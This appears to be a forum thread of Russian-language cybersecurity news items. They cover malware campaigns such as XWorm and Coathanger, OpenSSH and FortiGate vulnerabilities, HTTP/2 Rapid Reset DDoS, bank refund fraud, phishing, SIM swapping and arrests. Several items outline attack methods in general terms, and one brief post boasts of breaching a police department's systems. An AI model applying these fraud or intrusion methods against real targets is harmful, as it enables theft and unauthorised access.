«Судя по быстрой проверке, лицо или группа лиц, ответственных за атаку, могут иметь ближневосточное или индийское происхождение, хотя окончательная атрибуция не подтверждена», — пишут эксперты.
Click to expand...
Сам XWorm – не новый вредонос, он [рекламируется](https://blog.cyble.com/2022/08/19/evilcoder-project-selling- multiple-dangerous-tools-online/) на хакерских форумах и обладает широким набором функций, позволяющих похищать конфиденциальную информацию с зараженных хостов. Эта малварь способна воровать данные из буфера обмена, использоваться для DDoS-атак и атак программ-вымогателей, распространяться через USB и доставлять на зараженную машину дополнительные полезные нагрузки.
Хотя неясно, кто именно стоит за обнаруженными атаками, по словам аналитиков Securonix, методы и некоторые артефакты указывают на возможную связь с группировкой [TA558](https://www.proofpoint.com/us/blog/threat- insight/reservations-requested-ta558-targets-hospitality-and-travel), которая в прошлом атаковала гостиничный бизнес.
xakep.ru
«Сотрудниками Управления экономической безопасности и противодействия коррупции ГУ МВД России по г. Москве совместно с оперативниками Московского уголовного розыска и ФСБ России пресечена многомиллионная схема хищения денежных средств кредитной организации.
По версии следствия, мошенники использовали для реализации преступного замысла особенности работы системы электронных платежей. Они зарегистрировали более двухсот подставных фирм в сфере розничной торговли и открыли им расчетные счета в одном банке. Фиктивные покупатели оплачивали якобы приобретенные товары и полученные услуги по QR-коду, банк незамедлительно автоматически зачислял на счета фирм-получателей свои средства, как это предусмотрено системой быстрых платежей. Сразу после поступления денег злоумышленники оформляли возврат оплаты, информация о чем поступала в банк только через сутки. Наличие такого временного разрыва позволило похитить, обналичить и распределить денежные средства между соучастниками. Общий ущерб превысил 280 миллионов рублей», – сообщила официальный представитель МВД России Ирина Волк.
В криминальной схеме принимали участие сообщники из Ленинградской и Челябинской областей.
Следователем ГСУ ГУ МВД России по г. Москве возбуждено уголовное дело по признакам преступлений, предусмотренных статьями 159, 222 и 173.1 УК РФ.
В ходе обысков изъяты печати, кредитные карты, ноутбуки, средства связи, электронные носители информации, черновые записи, огнестрельное оружие и патроны к нему без соответствующих разрешительных документов.
«Полицейскими установлены девять участников группы. Троим из них избрана мера пресечения в виде заключения под стражу, трое находятся под домашним арестом. Еще трое объявлены в международный розыск.
В настоящее время уголовное дело с обвинительным заключением в отношении шести фигурантов направлено в Симоновский районный суд г. Москвы для рассмотрения по существу», – добавила Ирина Волк.
• Video: https://rutube.ru/video/9c155c7db04a1b32aba5117f2e7759fd/?r=plemwd
Специалисты по кибербезопасности из компании Qualys обнаружили критическую уязвимость в OpenSSH, которая позволяет злоумышленникам получить полный контроль над серверами с библиотекой Glibc. Проблема, обозначенная как CVE-2024-6387 и названная regreSSHion, затрагивает версии OpenSSH начиная с 8.5 и представляет собой серьёзную угрозу для серверов по всему миру.
В лабораторных условиях атака на уязвимость потребовала 6-8 часов непрерывных попыток подключения к серверу на 32-разрядных системах с включённой защитой ASLR. На системах без этой защиты атака проходит гораздо быстрее, а на 64-разрядных системах требуется больше времени, хотя успешное осуществление атаки представляется возможным в течение недели.
Чтобы обезопасить свои серверы, администраторы должны немедленно обновить OpenSSH до версии 9.8, где эта уязвимость уже исправлена.
Голландская служба военной разведки и безопасности (MIVD) [предупредила](https://www.ncsc.nl/actueel/nieuws/2024/juni/10/aanhoudende- statelijke-cyberspionagecampagne-via-kwetsbare-edge-devices), что последствия китайской кибершпионской кампании, раскрытой ранее в этом году, оказались «гораздо масштабнее», чем предполагалось изначально. В период с 2022 по 2023 год хакеры взломали 20 000 системам Fortinet FortiGate по всему миру, воспользовавшись критической уязвимостью.
В феврале 2024 года MIVD, совместно с Генеральной службой разведки и безопасности Нидерландов (AIVD) опубликовали отчет, согласно которому китайские хакеры эксплуатировали критическую RCE-уязвимость в FortiOS/FortiProxy (CVE-2022-42475) в течение нескольких месяцев в 2022 и 2023 году.
Таким образом злоумышленники устанавливали троян удаленного доступа Coathanger на взломанные машины, и тогда сообщалось, что атака затронула Министерство обороны страны.
Как теперь заявили в MIVD, от рук только одной китайской хак-группы пострадали около 14 000 устройств. Среди целей хакеров были десятки западных правительств, международных организаций и множество компаний, работающих в сфере оборонной промышленности.
Специалисты предупреждают, что Coathanger способен «пережить» перезагрузку системы и обновление прошивки, и предоставляет злоумышленникам постоянный доступ к взломанным системам. «Даже если жертва устанавливает патчи FortiGate, злоумышленники все равно сохраняют доступ», — пишут представители MIVD.
Сообщается, что в общей сложности хакеры получили доступ к 20 000 систем FortiGate по всему миру в период с 2022 по 2023 год. Причем атаки начались за несколько месяцев до раскрытия информации о CVE-2022-42475.
В MIVD считают, что китайские хакеры все еще сохраняют доступ ко многим пострадавшим организациям, поскольку Coathanger крайне трудно обнаружить, ведь малварь перехватывает системные вызовы, чтобы не выдать своего присутствия.
США не выдали визу главе делегации РФ для участия в заключительной сессии спецкомитета ООН по разработке конвенции о противодействии использованию информационно-коммуникационных технологий в преступных целях, заявил на заседании комитета главный советник департамента международной информационной безопасности МИД РФ Андрей Акульчев, об этом сообщают РИА Новости.
"Хочу напомнить, что нашему главе делегации было отказано во въезде в США для участия в заключительной сессии. Поэтому я зачитаю его выступление", - сказал Акульчев.
Click to expand...
Дипломат зачитал обращение от имени Люкманова. По словам главы делегации, работа спецкомитета ГА ООН по разработке специальной конвенции о противодействии использованию информационно-коммуникационных технологий преступных целях близится к завершению. Ее итоги Москва считает противоречивыми.
"Прежде всего отмечаем отсутствие реакции со стороны Секретариата к нашим просьбам решить вопрос об обеспечении полноценного участия российской делегации в переговорах. Речь о неспособности или нежелании прекратить саботаж США и Австрии, которые отказывают в выдаче виз нашим дипломатам, экспертам из ведомств или предельно затягивают их рассмотрение. Под ударом оказался один из главных вдохновителей будущего договора - замглавы российской делегации Эрнест Чернухин", - говорится в заявлении Люкманова.
Click to expand...
На заключительной сессии РФ столкнулась с еще одним ограничением в виде неспособности Секретариата спецкомитета организовать гибридный формат переговоров.
Спецкомитет по разработке конвенции о противодействии использованию информационно-коммуникационных технологий в преступных целях был учрежден по инициативе России, чтобы создать под эгидой ООН международно-правовой инструмент по борьбе с информационной преступностью.
Злоумышленники использовали фишинговые ссылки для получения данных банковских карт граждан и в дальнейшем присваивали деньги с их счетов. Шестерым фигурантам правоохранительные объявили подозрения, им может грозить до 12-ти лет заключения.
Участников так называемого «скам-сообщества» разоблачили сотрудники управления противодействия киберпреступлениям Харьковщины совместно со следственным управлением главка полиции Харьковской области.
Организатор, 23-летний гражданин Украины, привлек к противоправной деятельности еще восьмерых граждан. Мужчина создал сайт и сообщество в мессенджере «Telegram», где предоставлялись инструкции и фишинговые ссылки для участников мошеннической схемы.
Далее злоумышленники в мессенджерах рассылали фишинговые ссылки продавцам товаров, которых подыскивали на площадках объявлений. Людей уверяли, что присылают ссылки для оформления услуги доставки, просили указать данные карточек якобы для получения денег за проданный товар. Данные, введенные на мошеннических ресурсах, автоматически становились известны фигурантам.
Организатор схемы осуществлял компрометацию карт клиентов банка и с помощью платежных систем «выводил» деньги потерпевших на подконтрольные счета.
Устанавливается количество пострадавших от противоправной деятельности фигурантов. По предварительной информации, сумма ущерба может составить более двух миллионов гривен - эти данные будут установлены во время досудебного расследования.
По местам жительства фигурантов правоохранители провели обыски. Изъяты компьютерная техника, телефоны, «черновые» записи, банковские карты и SIM- карты.
Открыты уголовные производства по ч. 4 ст. 190 (Мошенничество) Уголовного кодекса Украины. Шестерым членам организованной группы объявлено подозрение. Фигурантам грозит до двенадцати лет лишения свободы с конфискацией имущества.
Процессуальное руководство осуществляют прокуроры Харьковской областной прокуратуры.
После проведения экспертиз будет решаться вопрос об объявлении подозрений другим участникам группировки.
Разоблачению злоумышленников способствовали сотрудники служб безопасности Universal Bank проекта «МоноБанк», ПриватБанк и Ощадбанк.
От лица издания в сети появились оскорбительные статьи в адрес руководства
Соединенных штатов.
New York Post, одна из крупнейших ежедневных газет Нью-Йорка, заявила, что
неизвестные взломали ее сайт и страницу Twitter. После взлома от лица издания
в сети появились оскорбительные статьи в адрес руководства Соединенных штатов.
«New York Post взломали. Сейчас мы ведем расследование произошедшего», —
сообщалось в аккаунте издания.
Позже выяснилось, что за взломом и публикацией оскорбительных статей стоял
один из сотрудников издания. Как пишет NBC News со ссылкой на представителя
газеты, сотрудник был уволен.
«Расследование New York Post указывает на то, что несанкционированное
поведение было совершено сотрудником, и этот сотрудник был уволен. Этим утром
мы немедленно удалили мерзкий и предосудительный контент с нашего веб-сайта и
аккаунтов в социальных сетях»,- сказано в сообщении представителя New York
Post.
Статьи, которые были опубликованы во время взлома были направлены против
действующего президента США Джозефа Байдена и его сына Хантера Байдена,
губернатора Нью-Йорка Кэти Хокал и мэра Нью-Йорка Эрика Адамса, а также члена
палаты представителей демократа Александры Окасио-Кортес.
Известный брокер уязвимостей, компании Zerodium, сообщает, что временно утраивает выплаты за эксплоиты для WordPress, которые обеспечивают удаленное выполнение кода в новейших версиях CMS. Теперь компания оценивает такие уязвимости и эксплоиты для них в 300 000 долларов США (против обычных 100 000 долларов США).
__https://twitter.com/x/status/1380489573009031170
Известно, что увеличение выплат будет временным, но в Zerodium пока не раскрыли ни причину этого решения, ни дату окончания этой «акции».
Как и в случае с другими аналогичными эксплоитами, эксплоит для WordPress должен работать на чистой установке CMS с конфигурацией по умолчанию, не требуя для атаки аутентификации или взаимодействия с пользователем. То есть использование уязвимостей в сторонних плагинах, независимо от того, насколько они популярны и широко распространены, не подойдет.
Стоит отметить, что самые высокие выплаты Zerodium предлагает за RCE- эксплоиты, нацеленные на Windows (1 000 000 долларов), и эксплоиты, которые могут предоставить злоумышленнику полный контроль над мобильными устройствами (2 500 000 долларов для Android и 2 000 000 долларов для iOS).
[](https://xakep.ru/wp- content/uploads/2021/04/345736/zerodium_prices.jpg)
Источник: xakep.ru/2021/04/12/zerodium-wp-rce/
Житель штата Пенсильвания Ричард Харрис обвинил телекоммуникационную компанию T-Mobile в халатности, которая привела к потере 1,63 BTC из-за мошенничества с подменой SIM-карты. Истец требует суда присяжных, согласно документу, направленному в окружной суд Восточного округа Пенсильвании.
В жалобе Харриса сказано, что T-Mobile не смогла должным образом защитить информацию клиента и нарушила ряд федеральных законов. Истец оценил стоимость потерянных активов в $55 000.
Согласно иску, Харрис хранил криптовалюту на платформе Coinbase. Биржевой аккаунт был привязан к номеру T-Mobile.
В июле 2020 года злоумышленник посетил офис оператора сотовой связи и убедил сотрудников предоставить ему доступ к «учетной записи истца и данным его SIM- карты». Он скопировал эту информацию на электронный носитель, а затем использовал ее для перевода средств с кошелька Харриса.
Последний не исключает, что в мошеннической схеме участвовал сотрудник T-Mobile, который сознательно передал конфиденциальные данные в руки преступника.
Истец требует возмещения ряда убытков, включая фактические потери, штрафные санкции, гонорары адвокатов и проценты за период до вынесения решения. Харрис считает, что халатность оператора связи повлекла за собой ущерб, превышающий $150 000.
T-Mobile не впервые сталкивается с иском криптовалютного инвестора. В феврале Келвин Ченг также обвинил компанию в потере 15 BTC из-за подмены SIM-карты. Он оценил ущерб в $450 000.
Ранее ФБР через протокол TLP, предназначенный для ограниченного распространения информации, выпустило предупреждение о растущей угрозе краж цифровых активов.
Как сообщает Bleeping Computer уведомление касалось биткоин-бирж, платежных платформ и других структур, взаимодействующих с криптовалютами. Оно получило «зеленый» код, что позволяет причастным делиться этой информацией.
По данным ФБР, существуют преступные группы, которые отслеживают уязвимости в инфраструктуре безопасности таких организаций. Конечная их цель — кража пользовательских средств. Для этого злоумышленники активно используют различные инструменты, включая социальную инженерию и мошенничество с SIM- картами.
Последний вектор атаки в ведомстве считают наиболее опасным, поскольку он является эффективным и относительно легким в исполнении. В ФБР также отметили, что зачастую в сговор с преступниками вступают сотрудники телекоммуникационных компаний.
Напомним, в январе житель Калифорнии лишился $27 000 в биткоине из-за подмены SIM-карты T-Mobile.
В феврале Европол сообщил об аресте десяти подозреваемых в краже более $100 млн в криптовалюте с помощью SIM-свопинга.
• Source: <https://ru.scribd.com/document/515894998/gov-uscourts- paed-586669-1-0#from_embed>
Франковский районный суд Львова приговорил к штрафу украинца за создание и распространение вредоносного программного обеспечения.
По версии следствия, в декабре 2020 года уроженец Львова, используя собственный ПК, создал программное обеспечение под названием «kpal_v3_Cracked- | PC-RET | _v2.zip | KPALV3_CR_LOCAL_V2.EXE», которое сразу разместил для скачивания в сети Интернет на специальном форуме, тем самым распространив вредоносное ПО неопределенному количеству лиц.
23 апреля 2021 года между прокурором и подозреваемым было заключено соглашение о признании виновности. Согласно условиям данного соглашения стороны договорились о правовой квалификации действий подозреваемого по ч.1 ст.361-1 УК Украины (создание с целью распространения вредоносного программного обеспечения, предназначенного для несанкционированного вмешательства в работу электронно-вычислительных машин), существенных для данного уголовного производства обстоятельств, а также наказания, которое должен понести обвиняемый в виде штрафа в размере 2000 необлагаемых минимумов доходов граждан, что составляет 34000 гривен.
Суд утвердил вышеуказанное соглашение. Кроме штрафа, суд обязал мужчину оплатить сумму 1307 грн. 60 коп за проведение компьютерно-технической экспертизы.
Специалисты Palo Alto Networks обнаружили 30 вредоносных образов в официальном репозитории контейнеров Docker. «Находки» специалистов были загружены более 20 000 000 раз и занимались скрытым майнингом криптовалюты.
Эксперты пишут, что эти вредоносные образы происходили с 10 разных аккаунтов, и большинство из них были доступны в Docker Hub на момент публикации исследования. Названия некоторых образов ясно давали понять, какова их цель, тогда как названия других пытались ввести пользователей в заблуждение (proxy, ggcloud или docker).
В большинстве случаев злоумышленники добывали с помощью зараженных образов криптовалюту Monero с помощью майнера XMRig. Однако в некоторых случаях образы майнили такие криптовалюты как Grin (GRIN) и ARO (Aronium).
Проверив майнинговые пулы, исследователи пришли к выводу, что криптоджекинг уже принес злоумышленникам примерно 200 000 долларов США.
Изучив теги вредоносных образов, специалисты заметили, что те относятся к разным версиям, архитектурам процессоров и ОС. По мнению аналитиков, «злоумышленники добавляют эти теги, чтобы охватить более широкий круг потенциальных жертв, включая ряд операционных систем и архитектур ЦП».
Хуже того, исследователи полагают, что это находка – лишь верхушка айсберга, и в действительности ситуация с облачным криптоджекингом обстоит гораздо хуже, ведь Docker Hub является лишь одним из публичных репозиториев, которым можно злоупотреблять таким образом.
Источник: xakep.ru/2021/03/30/docker-hub-miners/
Специалисты Group-IB обнаружили 706 мошеннических сайтов, стилизованных под официальный ресурс Rakuten Viber, где мошенники обещали пользователям розыгрыши и призы (на самом деле стремясь похитить их деньги).
Так как Group-IB заключила с Rakuten Viber партнерское соглашение для защиты бренда, компания ведет мониторинг подозрительной активности с использованием бренда Viber, отслеживая такие источники, как доменные имена, контекстную рекламу, поисковую выдачу, магазины мобильных приложений, соцсети, базы с утечками данных и даркнет. Кроме того, на вредоносные ресурсы жалуются сами пользователи, отмечая аккаунты, рассылающие спам или ссылки на мошеннические сайты.
В итоге было подсчитано, что в 2020 году количество мошеннических ресурсов, имитирующих сайт Viber, выросло на 190% по сравнению с предыдущим годом. Всего же на территории РФ в прошлом году было обнаружено более 706 мошеннических сайтов, чью деятельность практически полностью удалось прекратить — было закрыто 98% из этих ресурсов.
Первая волна мошенничества началась в феврале и была связана с пандемией, остальные выявленные случаи в большей степени касались годовщины компании Rakuten Viber — в 2020 году мессенджер отпраздновал свое десятилетие. Мошенники создавали сайты с ложной информацией о розыгрышах в мессенджере и делились ссылками на них в групповых и личных чатах Viber, а также за его пределами.
Для привлечения пользователей к своим сайтам злоумышленники обычно используют целевую рассылку сообщений с «приманкой» в виде конкурса, розыгрыша призов или лотереи. Причем, в зависимости от места нахождения потенциальной жертвы (мошенники считывают IP, доменную зону и другие данные) «приманка» рассылается на языке жертвы и идет от имени популярного в стране бренда или персоны.
Согласно оценкам Group-IB, на атаки и мошенничество с незаконным использованием брендов в мире пришлось 54% от всех киберпреступлений, которые были совершены в период за первые 9 месяцев 2020 года. В них выделяется две группы: фишинговые ресурсы, которые собирают учетные данные или платежную информацию жертв (16%) и интернет-мошенничество, мотивирующее пользователей добровольно переводить деньги злоумышленникам под видом оплаты интернет- заказов, получения компенсаций, розыгрышей призов или фейковых акций от известных брендов (38%).
Источник: xakep.ru/2021/02/08/viber-scam/
Новая техника DDoS (распределенный отказ в обслуживании) под названием «HTTP/2 Rapid Reset» активно используется как «нулевой день» с августа, побив все предыдущие рекорды по масштабам.
Новости о методе нулевого дня появились сегодня в виде скоординированного объявления Amazon Web Services, Cloudflare и Google, которые сообщают о снижении уровня атак, достигающем 155 миллионов запросов в секунду (Amazon), 201 миллиона запросов в секунду (Cloudflare) и рекордных 398 запросов в секунду. миллион запросов в секунду (Google).
Google заявляет, что им [удалось смягчить](http://cloud.google.com/blog/products/identity-security/google- cloud-mitigated-largest-ddos-attack-peaking-above-398-million-rps/) эти новые атаки, увеличив дополнительную пропускную способность на границе своей сети.
Cloudflare отмечает, что размер атаки, которую она смягчила, в три раза превышает ее предыдущий рекорд, зафиксированный в феврале 2023 года (71 миллион запросов в секунду), и вызывает тревогу то, что это было достигнуто с использованием относительно небольшого ботнета, состоящего из 20 000 машин.
С конца августа Cloudflare обнаружила и смягчила более тысячи DDoS-атак «HTTP/2 Rapid Reset», скорость которых превысила 10 миллионов запросов в секунду, причем 184 из них побили предыдущий рекорд в 71 миллион запросов в секунду.
Cloudflare уверена, что по мере того, как новые злоумышленники будут использовать все более обширные ботнеты вместе с этим новым методом атак, атаки HTTP/2 Rapid Reset будут продолжать бить еще большие рекорды.
«Сегодня существуют ботнеты, состоящие из сотен тысяч или миллионов машин», — [комментирует Cloudflare](https://blog.cloudflare.com/technical-breakdown- http2-rapid-reset-ddos-attack/) .
«Учитывая, что вся сеть обычно обрабатывает только 1–3 миллиарда запросов в секунду, вполне возможно, что использование этого метода может сосредоточить запросы всей сети на небольшом количестве целей».
Новая атака использует уязвимость нулевого дня, отслеживаемую как CVE-2023-44487, которая использует слабость протокола HTTP/2.
Проще говоря, метод атаки злоупотребляет функцией отмены потока HTTP/2 для непрерывной отправки и отмены запросов, перегружая целевой сервер/приложение и вводя состояние DoS.
HTTP/2 имеет защиту в виде параметра, который ограничивает количество одновременно активных потоков для предотвращения DoS-атак; однако это не всегда эффективно.
Разработчики протокола представили более эффективную меру под названием «отмена запроса», которая не разрывает все соединение, но которой можно злоупотреблять.
Злоумышленники злоупотребляют этой функцией с конца августа, отправляя на сервер шквал запросов и сбросов HTTP/2 (кадры RST_Stream), прося его обработать каждый из них и выполнить быстрый сброс, что подавляет его способность реагировать на новые входящие запросы. .
Диаграмма
потока запросов (Cloudflare)
«Протокол не требует от клиента и сервера каким-либо образом согласовывать
отмену, клиент может сделать это в одностороннем порядке», — [объясняет
Google](https://cloud.google.com/blog/products/identity-security/how-it-works-
the-novel-http2-rapid-reset-ddos-attack) в своем сообщении по этому вопросу.
«Клиент также может предположить, что отмена вступит в силу немедленно, когда сервер получит кадр RST_STREAM, прежде чем будут обработаны любые другие данные из этого TCP-соединения».
Обзор
логики быстрого сброса HTTP/2 (Google)
Cloudflare объясняет, что прокси-серверы HTTP/2 или балансировщики нагрузки особенно восприимчивы к длинным строкам запросов на сброс, отправляемым быстро.
Сеть компании была перегружена на участке между прокси-сервером TLS и его вышестоящим аналогом, поэтому ущерб был нанесен до того, как неверные запросы достигли точки блокировки.
С точки зрения реального воздействия, эти атаки привели к увеличению количества сообщений об ошибках 502 среди клиентов Cloudflare.
Cloudflare заявляет, что в конечном итоге смягчила эти атаки, используя систему, предназначенную для борьбы с гиперобъемными атаками, под названием «IP Jail», которую интернет-компания расширила, чтобы охватить всю свою инфраструктуру.
Эта система «изолирует» нарушающие IP-адреса и запрещает им использовать HTTP/2 для любого домена Cloudflare на определенный период времени, в то же время влияя на законных пользователей, использующих заблокированный IP-адрес, с незначительным падением производительности.
[Amazon заявляет](https://aws.amazon.com/blogs/security/how-aws-protects- customers-from-ddos-events/) , что смягчила десятки этих атак, не раскрывая никаких подробностей об их воздействии, подчеркивая, что доступность их клиентских сервисов была сохранена.
Атаки
смягчены Amazon в сентябре 2023 г.(AWS)
Все три фирмы пришли к выводу, что лучший подход для клиентов к
противодействию атакам HTTP/2 Rapid Reset — использовать все доступные
инструменты защиты от HTTP-наводнений и повысить устойчивость к DDoS-атакам с
помощью многогранных мер по смягчению последствий.
К сожалению, поскольку эта тактика злоупотребляет протоколом HTTP/2, не существует общего решения, которое полностью блокировало бы злоумышленникам использование этой техники DDoS.
Вместо этого разработчики программного обеспечения, использующие этот протокол в своем программном обеспечении, реализуют контроль скорости для смягчения атак HTTP/2 Rapid Reset.
В отдельном посте Cloudflare объясняет, что им пришлось хранить секрет нулевого дня более месяца, чтобы дать поставщикам средств безопасности и заинтересованным сторонам время отреагировать на угрозу, прежде чем о ней станет известно большему количеству злоумышленников и начнется игра в кошки- мышки. .
«До сегодняшнего дня мы сохраняли конфиденциальность информации, чтобы дать как можно большему количеству поставщиков средств безопасности возможность отреагировать», — пояснил [Cloudflare .](https://blog.cloudflare.com/zero-day- rapid-reset-http2-record-breaking-ddos-attack/)
«Однако в какой-то момент ответственным становится публичное раскрытие подобных угроз нулевого дня. Сегодня тот самый день».
ФСБ задержала двух полицейских из Жулебино за хищение биткоинов у задержанного
Следственный комитет расследует уголовное дело о хищении у задержанного
криптовалюты на сумму свыше 26 млн руб. Оперативники ФСБ задержали двух
подозреваемых лейтенантов полиции. Им грозит до десяти лет лишения свободы.
В среду, 6 сентября, сотрудники одного из управления ГСУ СКР по Москве возбудили уголовное дело по статье о мошенничестве в особо крупном размере (ч. 4 ст. 159 УК) в отношении сотрудников уголовного розыска отдела полиции по столичному району Выхино-Жулебино. Об этом РБК сообщил источник, близкий к СК, информацию подтвердил другой источник, знакомый с ходом расследования. Оба сотрудника полиции были в тот же день задержаны оперативниками ФСБ.
Один из собеседников РБК рассказал, что 19 июля около двух часов ночи сотрудники уголовного розыска остановили на Привольной улице мужчину, который якобы совершил правонарушение. «На него надели наручники и посадили в автомашину Toyota Land Cruiser», — отметил источник. По его словам, у задержанного забрали сотовый и заставили под предлогом непривлечения к ответственности перевести 9,6 биткоина (26,2 млн руб.). Деньги были переведены на подконтрольные сотрудникам кошельки. Фамилия пострадавшего от действий полицейских мужчины не разглашается в интересах следствия. Он является предпринимателем, отметил источник.
По версии следствия, сотрудники полиции ввели мужчину в заблуждение о его причастности к противоправным действиям, а наручники применили без объяснения причины.
В среду оперативники ФСБ совместно с сотрудниками собственной безопасности одного из управлений столичного главка МВД задержали двух лейтенантов полиции, один из них находился на дежурстве.
«При проведении мероприятий по проверке имеющейся информации оперативниками собственной безопасности ГУ МВД России по г. Москве установлена причастность двух сотрудников территориального отдела полиции к противоправной деятельности, их действия пресечены. <...> При подтверждении вины сотрудников они будут уволены из органов внутренних дел по отрицательным основаниям и понесут наказание в установленном законом порядке», — сообщили в столичной полиции.
Подозреваемые, под угрозой причинения вреда жизни вымогавшие 900 тыс. рублей у IT-специалиста из Тюмени за отказ разработать ПО для хищения денег со счетов в банках, задержаны в Москве, Свердловской и Челябинской областях. Об этом сообщили ТАСС в УФСБ по Тюменской области.
"Злоумышленники под угрозой причинения вреда жизни и здоровью вымогали денежные средства у специалиста в сфере IT-технологий за отказ от разработки вредоносного программного обеспечения с целью хищения средств с банковских счетов граждан. Подозреваемые задержаны на территории города Москвы, Свердловской и Челябинской областей", - сказано в сообщении.
Двое из задержанных - граждане России, третий - лицо без гражданства.
По данному факту УМВД России по Тюменской области возбуждено уголовное дело по пп. "а", "г" ч. 2 ст. 163 УК РФ (вымогательство, совершенное группой лиц по предварительному сговору в крупном размере). Задержанным избрана мера пресечения в виде заключения под стражу. B настоящее время проводятся выявляются иные эпизоды противоправной деятельности.
• Video: https://vk.com/video-33085660_456246609
• Video: комментатор огонЪ
https://t.me/TauNewsEkb/21708
Представители Интерпола сообщили, что в рамках операции «Первый свет 2022» (First Light 2022) были арестованы около 2000 человек, связанные с различными схемами социальной инженерии. В операции были задействованы правоохранительные органы 76 стран мира, включая Китай, Сингапур, Папуа-Новую Гвинею и Португалию. Нужно отметить, что это ежегодная операция, проводимая с 2014 года.
На этот раз операция проводилась с 8 марта по 8 мая текущего года и была сосредоточена на социальной инженерии, включая телефонное мошенничество, «романтический» скам и BEC-мошенничество, тесно связанные с финансовыми преступлениями и отмыванием денег.
Правоохранители рассказывают, что по итогам операции было проведено более 1700 обысков, установлены около 3000 подозреваемых, арестовано порядка 2000 операторов, мошенников и лиц, связанных с отмыванием денег, заморожено 4000 банковских счетов, а также перехвачены и конфискованы незаконные средства на сумму около 50 млн долларов США.
Интерпол сообщает о наиболее «ярких» моментах First Light 2022. К примеру, был задержан гражданин Китая, который обманул 24 000 человек на общую сумму 35 700 000 долларов. Также было раскрыто фальшивое дело о похищении, где от родителей «жертвы» требовали выкуп в размере 1 575 000 долларов.
Также в отчете Интерпола отдельно выделено мошенничество по схеме Понци, замаскированное под предложения о работе в области e-commerce и якобы обещающее участие в прибыльном сетевом бизнесе.
«В рамках операции First Light 2022 полиция Сингапура арестовала восемь подозреваемых в мошенничестве с трудоустройством по схеме Понци. Через социальные сети и мессенджеры мошенники предлагали высокооплачиваемую работу в области онлайн-маркетинга, где жертвы сначала получали бы небольшой заработок, а затем должны были привлечь больше участников, зарабатывая на этом комиссионные», — пишут правоохранители.
Кроме того, отмечается заметный рост торговли людьми в социальных сетях, когда жертв заманивают выгодными предложениями о работе, а затем те вынуждены работать принудительно, попадают в сексуальное рабство, в плен, оказываются в казино или на рыболовецких судах.
• Source: interpol.int/News-and-Events/News/2022/Hundreds-arrested-and- millions-seized-in-global-INTERPOL-operation-against-social-engineering-scams
Проставил полицейский участок hazletpd
На фс нашёл папку Apple_АЙПИ
там были переписи всякие с чатов тд тп вещдоки
как-то так ребят)
Утеря смартфона больше не станет проблемой для пользователей, ведь есть облачная синхронизация.
Вчера популярный OTP-менеджер Google Authenticator получил крупное обновление . Теперь приложение поддерживает облачную синхронизацию, что позволит не переживать о доступе в любимые сервисы даже при утере собственного смартфона.
Вот, что пишут в Google по этому поводу: «Одним из основных отзывов, которые мы слышали от пользователей на протяжении многих лет, была сложность работы с утерянными или украденными устройствами, на которых был установлен Google Authenticator. Поскольку одноразовые коды в Authenticator хранились только на одном устройстве, потеря этого устройства означала, что пользователи теряли и возможность входа в любой сервис, на котором они настроили 2FA с помощью Authenticator».
«В этом обновлении мы внедряем решение данной проблемы, делая одноразовые коды более надежными, безопасно сохраняя их в Google-аккаунтах пользователей» — добавили в Google.
Приложение Google Authenticator было представлено в далёком 2010 году и с тех пор получило множество разных обновлений, однако такая удобная вещь, как облачная синхронизация, разумеется, очень серьёзное и полезное нововведение, повышающее удобство пользователей в разы. При этом новая облачная синхронизация — совсем не обязательная к использованию функция, всё опционально.
В Google также решили добавить в приложение новых визуальных эффектов и сделать редизайн иконки в фирменных цветах. Дизайн иконки в виде серого сейфа остаётся в прошлом, на его смену приходит разноцветная звёздочка с треугольником посередине.
Как сообщают в компании, обновление будет развёртываться постепенно, поэтому прямо сейчас новый функционал может быть временно недоступен на некоторых устройствах. Однако в скором времени нововведения обязательно появятся на всех поддерживаемых смартфонах с Android и iOS на борту.
source: security.googleblog.com/2023/04/google-authenticator-now-supports.html
Компания настоятельно рекомендовала обновить прошивку установок SMA и SRA до версий 9.x до 10.x.
Поставщик сетевого оборудования SonicWall предупредил своих клиентов о
«надвигающейся кампании вымогательского ПО», нацеленной на некоторое его
оборудование.
«Благодаря сотрудничеству с доверенными третьими сторонами SonicWall стало
известно о злоумышленниках, активно атакующих серию продуктов Secure Mobile
Access (SMA) 100 и Secure Remote Access (SRA) с более неподдерживаемыми
версиями прошивки 8.x в ходе надвигающейся кампании вымогательского ПО с
использованием похищенных учетных данных», -
[говорится](https://www.sonicwall.com/support/product-notification/urgent-
security-notice-critical-risk-to-unpatched-end-of-life-sra-sma-8-x-remote-
access-devices/210713105333210/) в уведомлении SonicWall.
Как сообщила компания, злоумышленники эксплуатируют в атаках старую
уязвимость, исправленную в новых версиях прошивки. В связи с этим она
настоятельно рекомендовала клиентам обновить прошивку своих устройств.
«Если ваша организация использует устаревшие установки SRA с истекшим
окончанием срока поддержки, прошивка которых не может быть обновлена до версий
9.x, их дальнейшее использование может привести к атаке вымогательского ПО», -
сообщилось в уведомлении.
В случаях, когда обновление прошивки невозможно, рекомендуется незамедлительно
отключить устройства, сбросить пароли доступа и включить двухфакторную
аутентификацию, если она поддерживается.
Временных способов обойти уязвимость в устройствах с неподдерживаемыми
версиями прошивки не существует, и дальнейшее использование этих устройств
ставит безопасность предприятий под угрозу.
SonicWall также предупредила пользователей до сих пор поддерживаемых устройств
SMA 210/410/500v о необходимости обновить прошивку до версий 9.x до 10.x,
поскольку версии 8.x ставят безопасность этих устройств под угрозу (несмотря
на то, что их поддержка еще продолжается).
Еще в прошлом году мы рассказывали о том, что разработчики Mozilla признали FTP небезопасным протоколом и сообщили, что скоро уберут его поддержку в Firefox. Таким образом, пользователи более не смогут загружать файлы по протоколу FTP, а также просматривать в браузере содержимое FTP ссылок и папок.
«Мы делаем это из соображений безопасности. FTP — это небезопасный протокол, и нет причин выбирать его для загрузки ресурсов вместо HTTPS», — писали инженеры Mozilla.
Click to expand...
Отказ от FTP пришлось отложить из-за пандемии коронавируса, и точно так же поступили разработчики Google, которые даже успели отключить FTP в своем браузере, но затем временно включили поддержку протокола обратно. Дело в том, что многие правительственные учреждения, включая национальные институты здравоохранения, по-прежнему активно используют FTP, и разработчики решили не создавать им дополнительных проблем в условиях кризиса.
Теперь к вопросу отказа от поддержки FTP по умолчанию вернулись и инженеры Mozilla. В Firefox 88, вышедшем сегодня, поддержку протокола отключили по умолчанию, и теперь Firefox, столкнувшись с FTP-ссылкой, пытается передать ее внешнему приложению.
В следующем выпуске (Firefox 90) разработчики собираются окончательно удалить из браузера весь код, связанный с имплементацией FTP. Эти изменения так же затронут Firefox для Android. То есть в итоге для работы с FTP понадобится отдельный клиент.
